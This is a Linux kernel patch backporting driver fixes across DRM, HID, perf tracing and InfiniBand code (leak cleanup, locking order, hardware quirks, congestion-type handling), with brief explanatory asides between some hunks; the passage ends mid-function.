+diff --git a/drivers/gpu/drm/tidss/tidss_crtc.c b/drivers/gpu/drm/tidss/tidss_crtc.c
+index cb66a425dd200..896a77853ebc5 100644
+--- a/drivers/gpu/drm/tidss/tidss_crtc.c
++++ b/drivers/gpu/drm/tidss/tidss_crtc.c
+@@ -270,6 +270,16 @@ static void tidss_crtc_atomic_disable(struct drm_crtc *crtc,
+ 
+ 	reinit_completion(&tcrtc->framedone_completion);
+ 
++	/*
++	 * If a layer is left enabled when the videoport is disabled, and the
++	 * vid pipeline that was used for the layer is taken into use on
++	 * another videoport, the DSS will report sync lost issues. Disable all
++	 * the layers here as a work-around.
++	 */
++	for (u32 layer = 0; layer < tidss->feat->num_planes; layer++)
++		dispc_ovr_enable_layer(tidss->dispc, tcrtc->hw_videoport, layer,
++				       false);
++
+ 	dispc_vp_disable(tidss->dispc, tcrtc->hw_videoport);
+ 
+ 	if (!wait_for_completion_timeout(&tcrtc->framedone_completion,
+diff --git a/drivers/gpu/drm/tidss/tidss_plane.c b/drivers/gpu/drm/tidss/tidss_plane.c
+index 42d50ec5526d7..435b3b66ae632 100644
+--- a/drivers/gpu/drm/tidss/tidss_plane.c
++++ b/drivers/gpu/drm/tidss/tidss_plane.c
+@@ -211,7 +211,7 @@ struct tidss_plane *tidss_plane_create(struct tidss_device *tidss,
+ 
+ 	drm_plane_helper_add(&tplane->plane, &tidss_plane_helper_funcs);
+ 
+-	drm_plane_create_zpos_property(&tplane->plane, hw_plane_id, 0,
++	drm_plane_create_zpos_property(&tplane->plane, tidss->num_planes, 0,
+ 				       num_planes - 1);
+ 
+ 	ret = drm_plane_create_color_properties(&tplane->plane,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c b/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c
+index 60e3cc537f365..b9e5c8cd31001 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c
+@@ -65,8 +65,11 @@ static int vmw_gmrid_man_get_node(struct ttm_resource_manager *man,
+ 	ttm_resource_init(bo, place, *res);
+ 
+ 	id = ida_alloc_max(&gman->gmr_ida, gman->max_gmr_ids - 1, GFP_KERNEL);
+-	if (id < 0)
++	if (id < 0) {
++		ttm_resource_fini(man, *res);
++		kfree(*res);
+ 		return id;
++	}
+ 
+ 	spin_lock(&gman->lock);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+index c936d6a51c0cd..9c963ad27f9d1 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+@@ -34,6 +34,8 @@ static int sensor_mask_override = -1;
+ module_param_named(sensor_mask, sensor_mask_override, int, 0444);
+ MODULE_PARM_DESC(sensor_mask, "override the detected sensors mask");
+ 
++static bool intr_disable = true;
++
+ static int amd_sfh_wait_response_v2(struct amd_mp2_dev *mp2, u8 sid, u32 sensor_sts)
+ {
+ 	union cmd_response cmd_resp;
+@@ -54,7 +56,7 @@ static void amd_start_sensor_v2(struct amd_mp2_dev *privdata, struct amd_mp2_sen
+ 
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd_v2.cmd_id = ENABLE_SENSOR;
+-	cmd_base.cmd_v2.intr_disable = 1;
++	cmd_base.cmd_v2.intr_disable = intr_disable;
+ 	cmd_base.cmd_v2.period = info.period;
+ 	cmd_base.cmd_v2.sensor_id = info.sensor_idx;
+ 	cmd_base.cmd_v2.length = 16;
+@@ -72,7 +74,7 @@ static void amd_stop_sensor_v2(struct amd_mp2_dev *privdata, u16 sensor_idx)
+ 
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd_v2.cmd_id = DISABLE_SENSOR;
+-	cmd_base.cmd_v2.intr_disable = 1;
++	cmd_base.cmd_v2.intr_disable = intr_disable;
+ 	cmd_base.cmd_v2.period = 0;
+ 	cmd_base.cmd_v2.sensor_id = sensor_idx;
+ 	cmd_base.cmd_v2.length  = 16;
+@@ -86,7 +88,7 @@ static void amd_stop_all_sensor_v2(struct amd_mp2_dev *privdata)
+ 	union sfh_cmd_base cmd_base;
+ 
+ 	cmd_base.cmd_v2.cmd_id = STOP_ALL_SENSORS;
+-	cmd_base.cmd_v2.intr_disable = 1;
++	cmd_base.cmd_v2.intr_disable = intr_disable;
+ 	cmd_base.cmd_v2.period = 0;
+ 	cmd_base.cmd_v2.sensor_id = 0;
+ 
+@@ -288,6 +290,26 @@ int amd_sfh_irq_init(struct amd_mp2_dev *privdata)
+ 	return 0;
+ }
+ 
++static int mp2_disable_intr(const struct dmi_system_id *id)
++{
++	intr_disable = false;
++	return 0;
++}
++
++static const struct dmi_system_id dmi_sfh_table[] = {
++	{
++		/*
++		 * https://bugzilla.kernel.org/show_bug.cgi?id=218104
++		 */
++		.callback = mp2_disable_intr,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP ProBook x360 435 G7"),
++		},
++	},
++	{}
++};
++
+ static const struct dmi_system_id dmi_nodevs[] = {
+ 	{
+ 		/*
+@@ -311,6 +333,8 @@ static int amd_mp2_pci_probe(struct pci_dev *pdev, const struct pci_device_id *i
+ 	if (dmi_first_match(dmi_nodevs))
+ 		return -ENODEV;
+ 
++	dmi_check_system(dmi_sfh_table);
++
+ 	privdata = devm_kzalloc(&pdev->dev, sizeof(*privdata), GFP_KERNEL);
+ 	if (!privdata)
+ 		return -ENOMEM;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h
+index dfb7cabd82efe..2b125cd9742cb 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h
+@@ -89,10 +89,10 @@ enum mem_use_type {
+ struct hpd_status {
+ 	union {
+ 		struct {
+-			u32 human_presence_report : 4;
+-			u32 human_presence_actual : 4;
+-			u32 probablity		  : 8;
+ 			u32 object_distance       : 16;
++			u32 probablity		  : 8;
++			u32 human_presence_actual : 4;
++			u32 human_presence_report : 4;
+ 		} shpd;
+ 		u32 val;
+ 	};
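
For context on the hpd_status change above: bitfields inside a union with a u32 are allocated from the least significant bit upward on little-endian targets, so declaration order decides which bits each field occupies. The reordering maps object_distance to bits 15:0 and the presence fields to the top byte, putting the fields where the firmware evidently places them. A minimal sketch, assuming a little-endian build and an invented register value:

	union hpd_example {
		struct {
			u32 object_distance       : 16;	/* bits 15:0  */
			u32 probablity            : 8;	/* bits 23:16 */
			u32 human_presence_actual : 4;	/* bits 27:24 */
			u32 human_presence_report : 4;	/* bits 31:28 */
		} shpd;
		u32 val;
	};

	/* With .val = 0x81000064: object_distance == 100, probablity == 0,
	 * human_presence_actual == 1, human_presence_report == 8. */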
+diff --git a/drivers/hid/hid-lenovo.c b/drivers/hid/hid-lenovo.c
+index 149a3c74346b4..f86c1ea83a037 100644
+--- a/drivers/hid/hid-lenovo.c
++++ b/drivers/hid/hid-lenovo.c
+@@ -54,10 +54,10 @@ struct lenovo_drvdata {
+ 	/* 0: Up
+ 	 * 1: Down (undecided)
+ 	 * 2: Scrolling
+-	 * 3: Patched firmware, disable workaround
+ 	 */
+ 	u8 middlebutton_state;
+ 	bool fn_lock;
++	bool middleclick_workaround_cptkbd;
+ };
+ 
+ #define map_key_clear(c) hid_map_usage_clear(hi, usage, bit, max, EV_KEY, (c))
+@@ -621,6 +621,36 @@ static ssize_t attr_sensitivity_store_cptkbd(struct device *dev,
+ 	return count;
+ }
+ 
++static ssize_t attr_middleclick_workaround_show_cptkbd(struct device *dev,
++		struct device_attribute *attr,
++		char *buf)
++{
++	struct hid_device *hdev = to_hid_device(dev);
++	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
++
++	return snprintf(buf, PAGE_SIZE, "%u\n",
++		cptkbd_data->middleclick_workaround_cptkbd);
++}
++
++static ssize_t attr_middleclick_workaround_store_cptkbd(struct device *dev,
++		struct device_attribute *attr,
++		const char *buf,
++		size_t count)
++{
++	struct hid_device *hdev = to_hid_device(dev);
++	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
++	int value;
++
++	if (kstrtoint(buf, 10, &value))
++		return -EINVAL;
++	if (value < 0 || value > 1)
++		return -EINVAL;
++
++	cptkbd_data->middleclick_workaround_cptkbd = !!value;
++
++	return count;
++}
++
+ 
+ static struct device_attribute dev_attr_fn_lock =
+ 	__ATTR(fn_lock, S_IWUSR | S_IRUGO,
+@@ -632,10 +662,16 @@ static struct device_attribute dev_attr_sensitivity_cptkbd =
+ 			attr_sensitivity_show_cptkbd,
+ 			attr_sensitivity_store_cptkbd);
+ 
++static struct device_attribute dev_attr_middleclick_workaround_cptkbd =
++	__ATTR(middleclick_workaround, S_IWUSR | S_IRUGO,
++			attr_middleclick_workaround_show_cptkbd,
++			attr_middleclick_workaround_store_cptkbd);
++
+ 
+ static struct attribute *lenovo_attributes_cptkbd[] = {
+ 	&dev_attr_fn_lock.attr,
+ 	&dev_attr_sensitivity_cptkbd.attr,
++	&dev_attr_middleclick_workaround_cptkbd.attr,
+ 	NULL
+ };
+ 
+@@ -686,23 +722,7 @@ static int lenovo_event_cptkbd(struct hid_device *hdev,
+ {
+ 	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
+ 
+-	if (cptkbd_data->middlebutton_state != 3) {
+-		/* REL_X and REL_Y events during middle button pressed
+-		 * are only possible on patched, bug-free firmware
+-		 * so set middlebutton_state to 3
+-		 * to never apply workaround anymore
+-		 */
+-		if (hdev->product == USB_DEVICE_ID_LENOVO_CUSBKBD &&
+-				cptkbd_data->middlebutton_state == 1 &&
+-				usage->type == EV_REL &&
+-				(usage->code == REL_X || usage->code == REL_Y)) {
+-			cptkbd_data->middlebutton_state = 3;
+-			/* send middle button press which was hold before */
+-			input_event(field->hidinput->input,
+-				EV_KEY, BTN_MIDDLE, 1);
+-			input_sync(field->hidinput->input);
+-		}
+-
++	if (cptkbd_data->middleclick_workaround_cptkbd) {
+ 		/* "wheel" scroll events */
+ 		if (usage->type == EV_REL && (usage->code == REL_WHEEL ||
+ 				usage->code == REL_HWHEEL)) {
+@@ -1166,6 +1186,7 @@ static int lenovo_probe_cptkbd(struct hid_device *hdev)
+ 	cptkbd_data->middlebutton_state = 0;
+ 	cptkbd_data->fn_lock = true;
+ 	cptkbd_data->sensitivity = 0x05;
++	cptkbd_data->middleclick_workaround_cptkbd = true;
+ 	lenovo_features_set_cptkbd(hdev);
+ 
+ 	ret = sysfs_create_group(&hdev->dev.kobj, &lenovo_attr_group_cptkbd);
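
The new middleclick_workaround attribute follows the usual sysfs show/store pattern: parse, validate, update driver state, return count. As an aside, kstrtobool() is the common shorthand for such 0/1 flags (it also accepts y/n); a hypothetical equivalent store, not part of this patch:

	static ssize_t flag_store(struct device *dev,
				  struct device_attribute *attr,
				  const char *buf, size_t count)
	{
		bool val;

		if (kstrtobool(buf, &val))
			return -EINVAL;

		/* update the driver flag here, under any needed locking */
		return count;
	}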
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 5ec1f174127a3..3816fd06bc953 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2153,6 +2153,10 @@ static const struct hid_device_id mt_devices[] = {
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_SYNAPTICS, 0xcd7e) },
+ 
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_SYNAPTICS, 0xcddc) },
++
+ 	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_SYNAPTICS, 0xce08) },
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 8d8fa8e8afe04..20a9cddb3723a 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -654,6 +654,9 @@ static int hisi_ptt_pmu_event_init(struct perf_event *event)
+ 	int ret;
+ 	u32 val;
+ 
++	if (event->attr.type != hisi_ptt->hisi_ptt_pmu.type)
++		return -ENOENT;
++
+ 	if (event->cpu < 0) {
+ 		dev_dbg(event->pmu->dev, "Per-task mode not supported\n");
+ 		return -EOPNOTSUPP;
+@@ -662,9 +665,6 @@ static int hisi_ptt_pmu_event_init(struct perf_event *event)
+ 	if (event->attach_state & PERF_ATTACH_TASK)
+ 		return -EOPNOTSUPP;
+ 
+-	if (event->attr.type != hisi_ptt->hisi_ptt_pmu.type)
+-		return -ENOENT;
+-
+ 	ret = hisi_ptt_trace_valid_filter(hisi_ptt, event->attr.config);
+ 	if (ret < 0)
+ 		return ret;
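
The hisi_ptt hunk reorders the event_init checks because of how the perf core probes PMUs: when an event's type is not a fixed one, the core may offer the event to each registered PMU in turn, and only -ENOENT means "not mine, try the next"; any other error aborts the open. The type check must therefore run before returns such as -EOPNOTSUPP. The expected shape, sketched for a hypothetical PMU:

	static struct pmu example_pmu;

	static int example_pmu_event_init(struct perf_event *event)
	{
		/* Not our event type: -ENOENT lets the core try other PMUs. */
		if (event->attr.type != example_pmu.type)
			return -ENOENT;

		/* Only events we own get rejected with other codes. */
		if (event->attach_state & PERF_ATTACH_TASK)
			return -EOPNOTSUPP;

		return 0;
	}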
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index 3a9b9a28d858f..453188db39d83 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -1730,7 +1730,7 @@ static int assign_client_id(struct ib_client *client)
+ {
+ 	int ret;
+ 
+-	down_write(&clients_rwsem);
++	lockdep_assert_held(&clients_rwsem);
+ 	/*
+ 	 * The add/remove callbacks must be called in FIFO/LIFO order. To
+ 	 * achieve this we assign client_ids so they are sorted in
+@@ -1739,14 +1739,11 @@ static int assign_client_id(struct ib_client *client)
+ 	client->client_id = highest_client_id;
+ 	ret = xa_insert(&clients, client->client_id, client, GFP_KERNEL);
+ 	if (ret)
+-		goto out;
++		return ret;
+ 
+ 	highest_client_id++;
+ 	xa_set_mark(&clients, client->client_id, CLIENT_REGISTERED);
+-
+-out:
+-	up_write(&clients_rwsem);
+-	return ret;
++	return 0;
+ }
+ 
+ static void remove_client_id(struct ib_client *client)
+@@ -1776,25 +1773,35 @@ int ib_register_client(struct ib_client *client)
+ {
+ 	struct ib_device *device;
+ 	unsigned long index;
++	bool need_unreg = false;
+ 	int ret;
+ 
+ 	refcount_set(&client->uses, 1);
+ 	init_completion(&client->uses_zero);
++
++	/*
++	 * The devices_rwsem is held in write mode to ensure that a racing
++	 * ib_register_device() sees a consistent view of clients and devices.
++	 */
++	down_write(&devices_rwsem);
++	down_write(&clients_rwsem);
+ 	ret = assign_client_id(client);
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+-	down_read(&devices_rwsem);
++	need_unreg = true;
+ 	xa_for_each_marked (&devices, index, device, DEVICE_REGISTERED) {
+ 		ret = add_client_context(device, client);
+-		if (ret) {
+-			up_read(&devices_rwsem);
+-			ib_unregister_client(client);
+-			return ret;
+-		}
++		if (ret)
++			goto out;
+ 	}
+-	up_read(&devices_rwsem);
+-	return 0;
++	ret = 0;
++out:
++	up_write(&clients_rwsem);
++	up_write(&devices_rwsem);
++	if (need_unreg && ret)
++		ib_unregister_client(client);
++	return ret;
+ }
+ EXPORT_SYMBOL(ib_register_client);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index 1112afa0af552..8748b65c87ea7 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -595,6 +595,13 @@ struct hns_roce_work {
+ 	u32 queue_num;
+ };
+ 
++enum hns_roce_cong_type {
++	CONG_TYPE_DCQCN,
++	CONG_TYPE_LDCP,
++	CONG_TYPE_HC3,
++	CONG_TYPE_DIP,
++};
++
+ struct hns_roce_qp {
+ 	struct ib_qp		ibqp;
+ 	struct hns_roce_wq	rq;
+@@ -639,6 +646,7 @@ struct hns_roce_qp {
+ 	struct list_head	sq_node; /* all send qps are on a list */
+ 	struct hns_user_mmap_entry *dwqe_mmap_entry;
+ 	u32			config;
++	enum hns_roce_cong_type	cong_type;
+ };
+ 
+ struct hns_roce_ib_iboe {
+@@ -710,13 +718,6 @@ struct hns_roce_eq_table {
+ 	struct hns_roce_eq	*eq;
+ };
+ 
+-enum cong_type {
+-	CONG_TYPE_DCQCN,
+-	CONG_TYPE_LDCP,
+-	CONG_TYPE_HC3,
+-	CONG_TYPE_DIP,
+-};
+-
+ struct hns_roce_caps {
+ 	u64		fw_ver;
+ 	u8		num_ports;
+@@ -847,7 +848,7 @@ struct hns_roce_caps {
+ 	u16		default_aeq_period;
+ 	u16		default_aeq_arm_st;
+ 	u16		default_ceq_arm_st;
+-	enum cong_type	cong_type;
++	enum hns_roce_cong_type cong_type;
+ };
+ 
+ enum hns_roce_device_state {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 58fbb1d3b7f41..d06b19e69a151 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -4886,12 +4886,15 @@ static int check_cong_type(struct ib_qp *ibqp,
+ 			   struct hns_roce_congestion_algorithm *cong_alg)
+ {
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibqp->device);
++	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+ 
+-	if (ibqp->qp_type == IB_QPT_UD)
+-		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++	if (ibqp->qp_type == IB_QPT_UD || ibqp->qp_type == IB_QPT_GSI)
++		hr_qp->cong_type = CONG_TYPE_DCQCN;
++	else
++		hr_qp->cong_type = hr_dev->caps.cong_type;
+ 
+ 	/* different congestion types match different configurations */
+-	switch (hr_dev->caps.cong_type) {
++	switch (hr_qp->cong_type) {
+ 	case CONG_TYPE_DCQCN:
+ 		cong_alg->alg_sel = CONG_DCQCN;
+ 		cong_alg->alg_sub_sel = UNSUPPORT_CONG_LEVEL;
+@@ -4919,8 +4922,8 @@ static int check_cong_type(struct ib_qp *ibqp,
+ 	default:
+ 		ibdev_warn(&hr_dev->ib_dev,
+ 			   "invalid type(%u) for congestion selection.\n",
+-			   hr_dev->caps.cong_type);
+-		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++			   hr_qp->cong_type);
++		hr_qp->cong_type = CONG_TYPE_DCQCN;
+ 		cong_alg->alg_sel = CONG_DCQCN;
+ 		cong_alg->alg_sub_sel = UNSUPPORT_CONG_LEVEL;
+ 		cong_alg->dip_vld = DIP_INVALID;
+@@ -4939,6 +4942,7 @@ static int fill_cong_field(struct ib_qp *ibqp, const struct ib_qp_attr *attr,
+ 	struct hns_roce_congestion_algorithm cong_field;
+ 	struct ib_device *ibdev = ibqp->device;
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibdev);
++	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+ 	u32 dip_idx = 0;
+ 	int ret;
+ 
+@@ -4951,7 +4955,7 @@ static int fill_cong_field(struct ib_qp *ibqp, const struct ib_qp_attr *attr,
+ 		return ret;
+ 
+ 	hr_reg_write(context, QPC_CONG_ALGO_TMPL_ID, hr_dev->cong_algo_tmpl_id +
+-		     hr_dev->caps.cong_type * HNS_ROCE_CONG_SIZE);
++		     hr_qp->cong_type * HNS_ROCE_CONG_SIZE);
+ 	hr_reg_clear(qpc_mask, QPC_CONG_ALGO_TMPL_ID);
+ 	hr_reg_write(&context->ext, QPCEX_CONG_ALG_SEL, cong_field.alg_sel);
+ 	hr_reg_clear(&qpc_mask->ext, QPCEX_CONG_ALG_SEL);
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index 280d633d4ec4f..d691cdef5e9a3 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -1414,6 +1414,78 @@ static void irdma_setup_connection_wqes(struct irdma_qp_uk *qp,
+ 	IRDMA_RING_MOVE_HEAD_BY_COUNT_NOCHECK(qp->initial_ring, move_cnt);
+ }
+ 
++/**
++ * irdma_uk_calc_shift_wq - calculate WQE shift for both SQ and RQ
++ * @ukinfo: qp initialization info
++ * @sq_shift: Returns shift of SQ
++ * @rq_shift: Returns shift of RQ
++ */
++void irdma_uk_calc_shift_wq(struct irdma_qp_uk_init_info *ukinfo, u8 *sq_shift,
++			    u8 *rq_shift)
++{
++	bool imm_support = ukinfo->uk_attrs->hw_rev >= IRDMA_GEN_2;
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs,
++			    imm_support ? ukinfo->max_sq_frag_cnt + 1 :
++					  ukinfo->max_sq_frag_cnt,
++			    ukinfo->max_inline_data, sq_shift);
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs, ukinfo->max_rq_frag_cnt, 0,
++			    rq_shift);
++
++	if (ukinfo->uk_attrs->hw_rev == IRDMA_GEN_1) {
++		if (ukinfo->abi_ver > 4)
++			*rq_shift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
++	}
++}
++
++/**
++ * irdma_uk_calc_depth_shift_sq - calculate depth and shift for SQ size.
++ * @ukinfo: qp initialization info
++ * @sq_depth: Returns depth of SQ
++ * @sq_shift: Returns shift of SQ
++ */
++int irdma_uk_calc_depth_shift_sq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *sq_depth, u8 *sq_shift)
++{
++	bool imm_support = ukinfo->uk_attrs->hw_rev >= IRDMA_GEN_2;
++	int status;
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs,
++			    imm_support ? ukinfo->max_sq_frag_cnt + 1 :
++			    ukinfo->max_sq_frag_cnt,
++			    ukinfo->max_inline_data, sq_shift);
++	status = irdma_get_sqdepth(ukinfo->uk_attrs, ukinfo->sq_size,
++				   *sq_shift, sq_depth);
++
++	return status;
++}
++
++/**
++ * irdma_uk_calc_depth_shift_rq - calculate depth and shift for RQ size.
++ * @ukinfo: qp initialization info
++ * @rq_depth: Returns depth of RQ
++ * @rq_shift: Returns shift of RQ
++ */
++int irdma_uk_calc_depth_shift_rq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *rq_depth, u8 *rq_shift)
++{
++	int status;
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs, ukinfo->max_rq_frag_cnt, 0,
++			    rq_shift);
++
++	if (ukinfo->uk_attrs->hw_rev == IRDMA_GEN_1) {
++		if (ukinfo->abi_ver > 4)
++			*rq_shift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
++	}
++
++	status = irdma_get_rqdepth(ukinfo->uk_attrs, ukinfo->rq_size,
++				   *rq_shift, rq_depth);
++
++	return status;
++}
++
+ /**
+  * irdma_uk_qp_init - initialize shared qp
+  * @qp: hw qp (user and kernel)
+@@ -1428,23 +1500,12 @@ int irdma_uk_qp_init(struct irdma_qp_uk *qp, struct irdma_qp_uk_init_info *info)
+ {
+ 	int ret_code = 0;
+ 	u32 sq_ring_size;
+-	u8 sqshift, rqshift;
+ 
+ 	qp->uk_attrs = info->uk_attrs;
+ 	if (info->max_sq_frag_cnt > qp->uk_attrs->max_hw_wq_frags ||
+ 	    info->max_rq_frag_cnt > qp->uk_attrs->max_hw_wq_frags)
+ 		return -EINVAL;
+ 
+-	irdma_get_wqe_shift(qp->uk_attrs, info->max_rq_frag_cnt, 0, &rqshift);
+-	if (qp->uk_attrs->hw_rev == IRDMA_GEN_1) {
+-		irdma_get_wqe_shift(qp->uk_attrs, info->max_sq_frag_cnt,
+-				    info->max_inline_data, &sqshift);
+-		if (info->abi_ver > 4)
+-			rqshift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
+-	} else {
+-		irdma_get_wqe_shift(qp->uk_attrs, info->max_sq_frag_cnt + 1,
+-				    info->max_inline_data, &sqshift);
+-	}
+ 	qp->qp_caps = info->qp_caps;
+ 	qp->sq_base = info->sq;
+ 	qp->rq_base = info->rq;
+@@ -1458,7 +1519,7 @@ int irdma_uk_qp_init(struct irdma_qp_uk *qp, struct irdma_qp_uk_init_info *info)
+ 	qp->sq_size = info->sq_size;
+ 	qp->push_mode = false;
+ 	qp->max_sq_frag_cnt = info->max_sq_frag_cnt;
+-	sq_ring_size = qp->sq_size << sqshift;
++	sq_ring_size = qp->sq_size << info->sq_shift;
+ 	IRDMA_RING_INIT(qp->sq_ring, sq_ring_size);
+ 	IRDMA_RING_INIT(qp->initial_ring, sq_ring_size);
+ 	if (info->first_sq_wq) {
+@@ -1473,9 +1534,9 @@ int irdma_uk_qp_init(struct irdma_qp_uk *qp, struct irdma_qp_uk_init_info *info)
+ 	qp->rq_size = info->rq_size;
+ 	qp->max_rq_frag_cnt = info->max_rq_frag_cnt;
+ 	qp->max_inline_data = info->max_inline_data;
+-	qp->rq_wqe_size = rqshift;
++	qp->rq_wqe_size = info->rq_shift;
+ 	IRDMA_RING_INIT(qp->rq_ring, qp->rq_size);
+-	qp->rq_wqe_size_multiplier = 1 << rqshift;
++	qp->rq_wqe_size_multiplier = 1 << info->rq_shift;
+ 	if (qp->uk_attrs->hw_rev == IRDMA_GEN_1)
+ 		qp->wqe_ops = iw_wqe_uk_ops_gen_1;
+ 	else
+diff --git a/drivers/infiniband/hw/irdma/user.h b/drivers/infiniband/hw/irdma/user.h
+index d0cdf609f5e06..1e0e1a71dbada 100644
+--- a/drivers/infiniband/hw/irdma/user.h
++++ b/drivers/infiniband/hw/irdma/user.h
+@@ -295,6 +295,12 @@ void irdma_uk_cq_init(struct irdma_cq_uk *cq,
+ 		      struct irdma_cq_uk_init_info *info);
+ int irdma_uk_qp_init(struct irdma_qp_uk *qp,
+ 		     struct irdma_qp_uk_init_info *info);
++void irdma_uk_calc_shift_wq(struct irdma_qp_uk_init_info *ukinfo, u8 *sq_shift,
++			    u8 *rq_shift);
++int irdma_uk_calc_depth_shift_sq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *sq_depth, u8 *sq_shift);
++int irdma_uk_calc_depth_shift_rq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *rq_depth, u8 *rq_shift);
+ struct irdma_sq_uk_wr_trk_info {
+ 	u64 wrid;
+ 	u32 wr_len;
+@@ -374,8 +380,12 @@ struct irdma_qp_uk_init_info {
+ 	u32 max_sq_frag_cnt;
+ 	u32 max_rq_frag_cnt;
+ 	u32 max_inline_data;
++	u32 sq_depth;
++	u32 rq_depth;
+ 	u8 first_sq_wq;
+ 	u8 type;
++	u8 sq_shift;
++	u8 rq_shift;
+ 	int abi_ver;
+ 	bool legacy_mode;
+ };
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 42c671f209233..76c5f461faca0 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -277,7 +277,7 @@ static int irdma_alloc_ucontext(struct ib_ucontext *uctx,
+ 	struct irdma_alloc_ucontext_req req = {};
+ 	struct irdma_alloc_ucontext_resp uresp = {};
+ 	struct irdma_ucontext *ucontext = to_ucontext(uctx);
+-	struct irdma_uk_attrs *uk_attrs;
++	struct irdma_uk_attrs *uk_attrs = &iwdev->rf->sc_dev.hw_attrs.uk_attrs;
+ 
+ 	if (udata->inlen < IRDMA_ALLOC_UCTX_MIN_REQ_LEN ||
+ 	    udata->outlen < IRDMA_ALLOC_UCTX_MIN_RESP_LEN)
+@@ -292,7 +292,9 @@ static int irdma_alloc_ucontext(struct ib_ucontext *uctx,
+ 	ucontext->iwdev = iwdev;
+ 	ucontext->abi_ver = req.userspace_ver;
+ 
+-	uk_attrs = &iwdev->rf->sc_dev.hw_attrs.uk_attrs;
++	if (req.comp_mask & IRDMA_ALLOC_UCTX_USE_RAW_ATTR)
++		ucontext->use_raw_attrs = true;
++
+ 	/* GEN_1 legacy support with libi40iw */
+ 	if (udata->outlen == IRDMA_ALLOC_UCTX_MIN_RESP_LEN) {
+ 		if (uk_attrs->hw_rev != IRDMA_GEN_1)
+@@ -327,6 +329,7 @@ static int irdma_alloc_ucontext(struct ib_ucontext *uctx,
+ 		uresp.max_hw_cq_size = uk_attrs->max_hw_cq_size;
+ 		uresp.min_hw_cq_size = uk_attrs->min_hw_cq_size;
+ 		uresp.hw_rev = uk_attrs->hw_rev;
++		uresp.comp_mask |= IRDMA_ALLOC_UCTX_USE_RAW_ATTR;
+ 		if (ib_copy_to_udata(udata, &uresp,
+ 				     min(sizeof(uresp), udata->outlen))) {
+ 			rdma_user_mmap_entry_remove(ucontext->db_mmap_entry);
+@@ -566,6 +569,86 @@ static void irdma_setup_virt_qp(struct irdma_device *iwdev,
+ 	}
+ }
+ 
++/**
++ * irdma_setup_umode_qp - setup sq and rq size in user mode qp
++ * @iwdev: iwarp device
++ * @iwqp: qp ptr (user or kernel)
++ * @info: initialize info to return
++ * @init_attr: Initial QP create attributes
++ */
++static int irdma_setup_umode_qp(struct ib_udata *udata,
